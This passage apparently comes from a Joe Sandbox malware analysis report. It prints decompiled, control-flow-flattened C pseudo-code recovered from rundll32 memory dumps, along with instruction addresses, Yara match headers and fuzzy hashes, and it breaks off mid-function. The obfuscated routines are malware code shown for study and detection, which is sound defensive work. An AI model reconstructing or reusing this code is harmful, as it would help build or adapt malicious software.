                                                                                                                                                            				_v72 = _v72 + 0xffffefd1;
                                                                                                                                                            				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t309 = 0x546d98;
                                                                                                                                                            						do {
                                                                                                                                                            							L3:
                                                                                                                                                            							if(_t379 == _t309) {
                                                                                                                                                            								_t310 =  *0x393e00; // 0x0
                                                                                                                                                            								_t339 = _v56;
                                                                                                                                                            								_t311 = E00380DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                                                            								_t383 =  &(_t383[6]);
                                                                                                                                                            								__eflags = _t311 - _v80;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_t379 = 0x64eb485;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t379 = 0xb6ab68a;
                                                                                                                                                            									_t329 = 1;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t379 == 0x19763e8) {
                                                                                                                                                            									_push(_v128);
                                                                                                                                                            									_push(_v60);
                                                                                                                                                            									__eflags = E00379462(E0038DCF7(_v24, 0x3717f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                                                            									_t339 = _v140;
                                                                                                                                                            									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                                                            									E0037A8B0(_t339, _t313, _v120);
                                                                                                                                                            									_t383 =  &(_t383[8]);
                                                                                                                                                            									L14:
                                                                                                                                                            									_t369 =  *0x393e00; // 0x0
                                                                                                                                                            									_t309 = 0x546d98;
                                                                                                                                                            									goto L15;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t379 == 0x1e2498b) {
                                                                                                                                                            										_push(_t339);
                                                                                                                                                            										_push(_t339);
                                                                                                                                                            										_t373 = 0x28;
                                                                                                                                                            										_t321 = E00377FF2(_t373);
                                                                                                                                                            										 *0x393e00 = _t321;
                                                                                                                                                            										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                                                            										_t374 =  *0x393e00; // 0x0
                                                                                                                                                            										_t325 = E00377FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                                                            										_t369 =  *0x393e00; // 0x0
                                                                                                                                                            										_t379 = 0x19763e8;
                                                                                                                                                            										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                                                            										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                                                            										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                                                            										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                                                            										 *(_t369 + 4) = _t339;
                                                                                                                                                            										_t309 = 0x546d98;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t379 == 0x64eb485) {
                                                                                                                                                            											E00388519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                                                            											E00388519(_v64, _v72,  *0x393e00);
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t379 != 0xb6ab68a) {
                                                                                                                                                            												goto L15;
                                                                                                                                                            											} else {
                                                                                                                                                            												E0037957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							L18:
                                                                                                                                                            							return _t329;
                                                                                                                                                            							L15:
                                                                                                                                                            							__eflags = _t379 - 0xfde45c5;
                                                                                                                                                            						} while (__eflags != 0);
                                                                                                                                                            						goto L18;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}


























































                                                                                                                                                            0x00380849
                                                                                                                                                            0x00380851
                                                                                                                                                            0x00380859
                                                                                                                                                            0x00380859
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x00380864
                                                                                                                                                            0x00380864
                                                                                                                                                            0x00380866
                                                                                                                                                            0x00380985
                                                                                                                                                            0x0038099f
                                                                                                                                                            0x003809a3
                                                                                                                                                            0x003809a8
                                                                                                                                                            0x003809ab
                                                                                                                                                            0x003809af
                                                                                                                                                            0x003809be
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809b1
                                                                                                                                                            0x003809b3
                                                                                                                                                            0x003809b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809b8
                                                                                                                                                            0x0038086c
                                                                                                                                                            0x00380872
                                                                                                                                                            0x0038091a
                                                                                                                                                            0x00380923
                                                                                                                                                            0x00380963
                                                                                                                                                            0x00380967
                                                                                                                                                            0x00380970
                                                                                                                                                            0x00380973
                                                                                                                                                            0x00380978
                                                                                                                                                            0x003809c0
                                                                                                                                                            0x003809c0
                                                                                                                                                            0x003809c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380878
                                                                                                                                                            0x0038087e
                                                                                                                                                            0x003808c7
                                                                                                                                                            0x003808c8
                                                                                                                                                            0x003808cb
                                                                                                                                                            0x003808cc
                                                                                                                                                            0x003808d1
                                                                                                                                                            0x003808d6
                                                                                                                                                            0x003808e9
                                                                                                                                                            0x003808f2
                                                                                                                                                            0x003808f7
                                                                                                                                                            0x003808fd
                                                                                                                                                            0x00380907
                                                                                                                                                            0x00380909
                                                                                                                                                            0x0038090c
                                                                                                                                                            0x0038090f
                                                                                                                                                            0x00380912
                                                                                                                                                            0x0038085f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380880
                                                                                                                                                            0x00380882
                                                                                                                                                            0x003809e7
                                                                                                                                                            0x003809fa
                                                                                                                                                            0x00380888
                                                                                                                                                            0x0038088e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00380894
                                                                                                                                                            0x003808ae
                                                                                                                                                            0x003808b3
                                                                                                                                                            0x0038088e
                                                                                                                                                            0x00380882
                                                                                                                                                            0x0038087e
                                                                                                                                                            0x00380872
                                                                                                                                                            0x00380a04
                                                                                                                                                            0x00380a0d
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x003809cb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003809d7
                                                                                                                                                            0x0038085f

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 0-2314114710
                                                                                                                                                            • Opcode ID: 10bd05cb842d9e11d31f459c79b3193926251798023c1792c01d7a08ca893a54
                                                                                                                                                            • Instruction ID: dc00707d2e06aa77b8ed20983cdca64f5b9e5dd0d1a2c42868aa51ac4065994b
                                                                                                                                                            • Opcode Fuzzy Hash: 10bd05cb842d9e11d31f459c79b3193926251798023c1792c01d7a08ca893a54
                                                                                                                                                            • Instruction Fuzzy Hash: 94E130725083809FD3A8CF25D58AA0BBBF1BBC4718F60891DF59A86260C7B1C949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Iconic
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 110040809-0
                                                                                                                                                            • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                                            • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                                                            • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                                                            • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                            			E00389EEC() {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				char _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _t207;
                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                            				intOrPtr _t212;
                                                                                                                                                            				intOrPtr _t214;
                                                                                                                                                            				intOrPtr _t218;
                                                                                                                                                            				void* _t219;
                                                                                                                                                            				signed int _t221;
                                                                                                                                                            				signed int _t222;
                                                                                                                                                            				signed int _t223;
                                                                                                                                                            				signed int _t224;
                                                                                                                                                            				signed int _t225;
                                                                                                                                                            				signed int _t257;
                                                                                                                                                            				void* _t259;
                                                                                                                                                            				char _t263;
                                                                                                                                                            				void* _t264;
                                                                                                                                                            				void* _t266;
                                                                                                                                                            
                                                                                                                                                            				_v64 = 0xd7ee0e;
                                                                                                                                                            				_t257 = 0x22;
                                                                                                                                                            				_v64 = _v64 / _t257;
                                                                                                                                                            				_v64 = _v64 + 0x89a9;
                                                                                                                                                            				_t219 = 0;
                                                                                                                                                            				_v64 = _v64 ^ 0x0000b335;
                                                                                                                                                            				_t259 = 0xb83ebc6;
                                                                                                                                                            				_v96 = 0xf5dfb6;
                                                                                                                                                            				_v96 = _v96 >> 6;
                                                                                                                                                            				_t221 = 0x26;
                                                                                                                                                            				_v96 = _v96 / _t221;
                                                                                                                                                            				_t222 = 0x2d;
                                                                                                                                                            				_v96 = _v96 * 0x58;
                                                                                                                                                            				_v96 = _v96 ^ 0x000b9251;
                                                                                                                                                            				_v60 = 0xd70e95;
                                                                                                                                                            				_v60 = _v60 >> 9;
                                                                                                                                                            				_v60 = _v60 + 0xffffe8b9;
                                                                                                                                                            				_v60 = _v60 ^ 0x00062b78;
                                                                                                                                                            				_v44 = 0xb641ac;
                                                                                                                                                            				_v44 = _v44 / _t222;
                                                                                                                                                            				_v44 = _v44 ^ 0x0002d028;
                                                                                                                                                            				_v52 = 0xbf8457;
                                                                                                                                                            				_t223 = 0x5d;
                                                                                                                                                            				_v52 = _v52 / _t223;
                                                                                                                                                            				_v52 = _v52 | 0xbb7661a2;
                                                                                                                                                            				_v52 = _v52 ^ 0xbb710206;
                                                                                                                                                            				_v80 = 0x47b11a;
                                                                                                                                                            				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                                                            				_t224 = 0x18;
                                                                                                                                                            				_v80 = _v80 / _t224;
                                                                                                                                                            				_v80 = _v80 + 0xffff1c96;
                                                                                                                                                            				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                                                            				_v36 = 0x40dca8;
                                                                                                                                                            				_v36 = _v36 + 0x3144;
                                                                                                                                                            				_v36 = _v36 ^ 0x004d2780;
                                                                                                                                                            				_v40 = 0xec5297;
                                                                                                                                                            				_v40 = _v40 * 0x45;
                                                                                                                                                            				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                                                            				_v72 = 0x18b121;
                                                                                                                                                            				_v72 = _v72 >> 1;
                                                                                                                                                            				_v72 = _v72 * 0x1e;
                                                                                                                                                            				_v72 = _v72 + 0xfd79;
                                                                                                                                                            				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                                                            				_v76 = 0xd8cc67;
                                                                                                                                                            				_v76 = _v76 >> 2;
                                                                                                                                                            				_v76 = _v76 >> 0xd;
                                                                                                                                                            				_v76 = _v76 * 0x23;
                                                                                                                                                            				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                                                            				_v88 = 0x5f1bd9;
                                                                                                                                                            				_v88 = _v88 + 0x89b3;
                                                                                                                                                            				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                                                            				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                                                            				_v88 = _v88 ^ 0x14801a76;
                                                                                                                                                            				_v92 = 0x778c42;
                                                                                                                                                            				_t225 = 0x6d;
                                                                                                                                                            				_v92 = _v92 * 0x69;
                                                                                                                                                            				_v92 = _v92 << 0xb;
                                                                                                                                                            				_v92 = _v92 | 0xba472be1;
                                                                                                                                                            				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                                                            				_v56 = 0x5dd318;
                                                                                                                                                            				_v56 = _v56 / _t257;
                                                                                                                                                            				_v56 = _v56 << 0xc;
                                                                                                                                                            				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                                                            				_v84 = 0xd870dc;
                                                                                                                                                            				_v84 = _v84 >> 0x10;
                                                                                                                                                            				_v84 = _v84 | 0x1345b487;
                                                                                                                                                            				_v84 = _v84 * 0x5a;
                                                                                                                                                            				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                                                            				_v48 = 0x9a419e;
                                                                                                                                                            				_v48 = _v48 | 0xfa3afde2;
                                                                                                                                                            				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                                                            				_v32 = 0x7a1ab;
                                                                                                                                                            				_v32 = _v32 / _t225;
                                                                                                                                                            				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                                                            				_v68 = 0x67bbab;
                                                                                                                                                            				_v68 = _v68 + 0xffffccf8;
                                                                                                                                                            				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                                                            				_v68 = _v68 << 0xd;
                                                                                                                                                            				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                                                            				_t263 = _v28;
                                                                                                                                                            				_t258 = _v28;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t266 = _t259 - 0xc23b37f;
                                                                                                                                                            						if(_t266 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t266 == 0) {
                                                                                                                                                            							E00388519(_v56, _v84, _v24);
                                                                                                                                                            							_t259 = 0xdb1153f;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t259 == 0xab8c2) {
                                                                                                                                                            							_t209 =  *0x393e10; // 0x0
                                                                                                                                                            							E00378ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                                                            							_t212 =  *0x393e10; // 0x0
                                                                                                                                                            							_t234 = _v16;
                                                                                                                                                            							_t264 = _t264 + 0xc;
                                                                                                                                                            							_t219 = 1;
                                                                                                                                                            							_t259 = 0xc23b37f;
                                                                                                                                                            							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t259 == 0x26dca52) {
                                                                                                                                                            							_t234 = _v96;
                                                                                                                                                            							_t214 = E0037A9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                                                            							_t258 = _t214;
                                                                                                                                                            							_t264 = _t264 + 0xc;
                                                                                                                                                            							if(_t214 == 0) {
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            							_t259 = 0xe747a68;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t259 == 0xa9b692f) {
                                                                                                                                                            							_t263 = E0037F899(_t234);
                                                                                                                                                            							_t259 = 0x26dca52;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t259 != 0xb83ebc6) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t259 = 0xa9b692f;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(_t259 == 0xdb1153f) {
                                                                                                                                                            						E00374E7D(_v48, _v32, _t258, _v68);
                                                                                                                                                            						_t259 = 0xdb3b1d3;
                                                                                                                                                            						goto L21;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t259 == 0xe566670) {
                                                                                                                                                            						_t207 = E0038894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                                                            						_t264 = _t264 + 0x10;
                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                            						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t259 != 0xe747a68) {
                                                                                                                                                            						goto L21;
                                                                                                                                                            					}
                                                                                                                                                            					_t259 = 0xdb1153f;
                                                                                                                                                            					if(_v28 > 2) {
                                                                                                                                                            						_t218 = E00374346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                                                            						_v24 = _t218;
                                                                                                                                                            						_pop(_t234);
                                                                                                                                                            						if(_t218 != 0) {
                                                                                                                                                            							_t259 = 0xe566670;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					goto L1;
                                                                                                                                                            					L21:
                                                                                                                                                            				} while (_t259 != 0xdb3b1d3);
                                                                                                                                                            				L22:
                                                                                                                                                            				return _t219;
                                                                                                                                                            			}










































                                                                                                                                                            0x0038a03e
                                                                                                                                                            0x0038a043
                                                                                                                                                            0x0038a04d
                                                                                                                                                            0x0038a051
                                                                                                                                                            0x0038a059
                                                                                                                                                            0x0038a061
                                                                                                                                                            0x0038a069
                                                                                                                                                            0x0038a071
                                                                                                                                                            0x0038a079
                                                                                                                                                            0x0038a081
                                                                                                                                                            0x0038a092
                                                                                                                                                            0x0038a093
                                                                                                                                                            0x0038a097
                                                                                                                                                            0x0038a09c
                                                                                                                                                            0x0038a0a4
                                                                                                                                                            0x0038a0ac
                                                                                                                                                            0x0038a0bc
                                                                                                                                                            0x0038a0c0
                                                                                                                                                            0x0038a0c5
                                                                                                                                                            0x0038a0cd
                                                                                                                                                            0x0038a0d5
                                                                                                                                                            0x0038a0da
                                                                                                                                                            0x0038a0e7
                                                                                                                                                            0x0038a0eb
                                                                                                                                                            0x0038a0f3
                                                                                                                                                            0x0038a0fb
                                                                                                                                                            0x0038a103
                                                                                                                                                            0x0038a10b
                                                                                                                                                            0x0038a119
                                                                                                                                                            0x0038a11d
                                                                                                                                                            0x0038a125
                                                                                                                                                            0x0038a12d
                                                                                                                                                            0x0038a135
                                                                                                                                                            0x0038a13d
                                                                                                                                                            0x0038a142
                                                                                                                                                            0x0038a14a
                                                                                                                                                            0x0038a14e
                                                                                                                                                            0x0038a14e
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a152
                                                                                                                                                            0x0038a158
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a15e
                                                                                                                                                            0x0038a216
                                                                                                                                                            0x0038a21c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a21c
                                                                                                                                                            0x0038a16a
                                                                                                                                                            0x0038a1d5
                                                                                                                                                            0x0038a1e9
                                                                                                                                                            0x0038a1ee
                                                                                                                                                            0x0038a1f5
                                                                                                                                                            0x0038a1f9
                                                                                                                                                            0x0038a1fc
                                                                                                                                                            0x0038a1fd
                                                                                                                                                            0x0038a202
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a202
                                                                                                                                                            0x0038a172
                                                                                                                                                            0x0038a1af
                                                                                                                                                            0x0038a1b4
                                                                                                                                                            0x0038a1b9
                                                                                                                                                            0x0038a1bb
                                                                                                                                                            0x0038a1c0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a1c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a1c6
                                                                                                                                                            0x0038a17a
                                                                                                                                                            0x0038a198
                                                                                                                                                            0x0038a19a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a19a
                                                                                                                                                            0x0038a182
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a188
                                                                                                                                                            0x0038a182
                                                                                                                                                            0x0038a22c
                                                                                                                                                            0x0038a2c6
                                                                                                                                                            0x0038a2cd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2cd
                                                                                                                                                            0x0038a238
                                                                                                                                                            0x0038a29a
                                                                                                                                                            0x0038a29f
                                                                                                                                                            0x0038a2a6
                                                                                                                                                            0x0038a2ae
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2ae
                                                                                                                                                            0x0038a240
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a24b
                                                                                                                                                            0x0038a250
                                                                                                                                                            0x0038a265
                                                                                                                                                            0x0038a26a
                                                                                                                                                            0x0038a26f
                                                                                                                                                            0x0038a272
                                                                                                                                                            0x0038a278
                                                                                                                                                            0x0038a278
                                                                                                                                                            0x0038a272
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038a2d2
                                                                                                                                                            0x0038a2d2
                                                                                                                                                            0x0038a2e1
                                                                                                                                                            0x0038a2e7

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: D1
                                                                                                                                                            • API String ID: 0-2215811268
                                                                                                                                                            • Opcode ID: a87a30863f470729f99a0bd5a4de79039dd0d889425ed21d6aabb95107f27afb
                                                                                                                                                            • Instruction ID: 2a36ea107c40507f988a424299c24d1a229a3371f378811ea132219592733cfd
                                                                                                                                                            • Opcode Fuzzy Hash: a87a30863f470729f99a0bd5a4de79039dd0d889425ed21d6aabb95107f27afb
                                                                                                                                                            • Instruction Fuzzy Hash: 21A165729083008FD369DF65C48941BFBE1BBC4354F50896EF5A99B220D7B5CA498F87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                            			E0038BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				void* _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				unsigned int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				void* _t138;
                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                            				void* _t162;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            				signed int _t181;
                                                                                                                                                            				signed int _t182;
                                                                                                                                                            				signed int _t183;
                                                                                                                                                            				void* _t185;
                                                                                                                                                            				signed int* _t189;
                                                                                                                                                            
                                                                                                                                                            				_t162 = __ecx;
                                                                                                                                                            				_push(1);
                                                                                                                                                            				_push(1);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t138);
                                                                                                                                                            				_v16 = 0xdfc885;
                                                                                                                                                            				_t189 =  &(( &_v76)[8]);
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_t185 = 0;
                                                                                                                                                            				_t164 = 0xcc97672;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v32 = 0x60c2fa;
                                                                                                                                                            				_v32 = _v32 >> 3;
                                                                                                                                                            				_v32 = _v32 ^ 0x00046f58;
                                                                                                                                                            				_v76 = 0xb548f0;
                                                                                                                                                            				_v76 = _v76 >> 0xc;
                                                                                                                                                            				_t181 = 0xc;
                                                                                                                                                            				_v76 = _v76 * 0x3c;
                                                                                                                                                            				_v76 = _v76 + 0xffff64d0;
                                                                                                                                                            				_v76 = _v76 ^ 0x0001fd54;
                                                                                                                                                            				_v52 = 0x15927a;
                                                                                                                                                            				_v52 = _v52 / _t181;
                                                                                                                                                            				_v52 = _v52 ^ 0x000151ae;
                                                                                                                                                            				_v56 = 0xd6ed9;
                                                                                                                                                            				_t182 = 0x1a;
                                                                                                                                                            				_v56 = _v56 * 0x3f;
                                                                                                                                                            				_v56 = _v56 + 0xfffffbb4;
                                                                                                                                                            				_v56 = _v56 ^ 0x0345d46e;
                                                                                                                                                            				_v64 = 0xba2b53;
                                                                                                                                                            				_v64 = _v64 * 0x6d;
                                                                                                                                                            				_v64 = _v64 ^ 0x73d6d9cf;
                                                                                                                                                            				_v64 = _v64 * 0x31;
                                                                                                                                                            				_v64 = _v64 ^ 0x981330b4;
                                                                                                                                                            				_v60 = 0x269f8;
                                                                                                                                                            				_v60 = _v60 >> 5;
                                                                                                                                                            				_v60 = _v60 + 0xffffb859;
                                                                                                                                                            				_v60 = _v60 ^ 0xfff00afd;
                                                                                                                                                            				_v68 = 0xfd9147;
                                                                                                                                                            				_v68 = _v68 ^ 0x8de1643f;
                                                                                                                                                            				_v68 = _v68 / _t182;
                                                                                                                                                            				_v68 = _v68 >> 0xf;
                                                                                                                                                            				_v68 = _v68 ^ 0x000df039;
                                                                                                                                                            				_v72 = 0x5def36;
                                                                                                                                                            				_v72 = _v72 | 0xd620e1c7;
                                                                                                                                                            				_v72 = _v72 + 0xd307;
                                                                                                                                                            				_t183 = 0x48;
                                                                                                                                                            				_v72 = _v72 / _t183;
                                                                                                                                                            				_v72 = _v72 ^ 0x02f0e4dc;
                                                                                                                                                            				_v24 = 0xf7704c;
                                                                                                                                                            				_v24 = _v24 + 0x27dd;
                                                                                                                                                            				_v24 = _v24 ^ 0x00ff74b2;
                                                                                                                                                            				_v28 = 0x151ed9;
                                                                                                                                                            				_v28 = _v28 * 0x48;
                                                                                                                                                            				_v28 = _v28 ^ 0x05f046e2;
                                                                                                                                                            				_v36 = 0xddc4df;
                                                                                                                                                            				_v36 = _v36 >> 0xf;
                                                                                                                                                            				_v36 = _v36 | 0x7f83127d;
                                                                                                                                                            				_v36 = _v36 ^ 0x7f8e5ab1;
                                                                                                                                                            				_v40 = 0x29fd7f;
                                                                                                                                                            				_v40 = _v40 >> 7;
                                                                                                                                                            				_v40 = _v40 | 0x8d3b2756;
                                                                                                                                                            				_v40 = _v40 ^ 0x8d37b79a;
                                                                                                                                                            				_v44 = 0x8dc5a8;
                                                                                                                                                            				_v44 = _v44 * 0x63;
                                                                                                                                                            				_v44 = _v44 >> 4;
                                                                                                                                                            				_v44 = _v44 ^ 0x036b3557;
                                                                                                                                                            				_v48 = 0xd61f7e;
                                                                                                                                                            				_v48 = _v48 | 0xd43d52c3;
                                                                                                                                                            				_v48 = _v48 + 0xa376;
                                                                                                                                                            				_v48 = _v48 ^ 0xd504b7b0;
                                                                                                                                                            				_t184 = _v20;
                                                                                                                                                            				while(_t164 != 0x2524be6) {
                                                                                                                                                            					if(_t164 == 0xcc97672) {
                                                                                                                                                            						_t164 = 0xe41debb;
                                                                                                                                                            						continue;
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t164 == 0xdd773d9) {
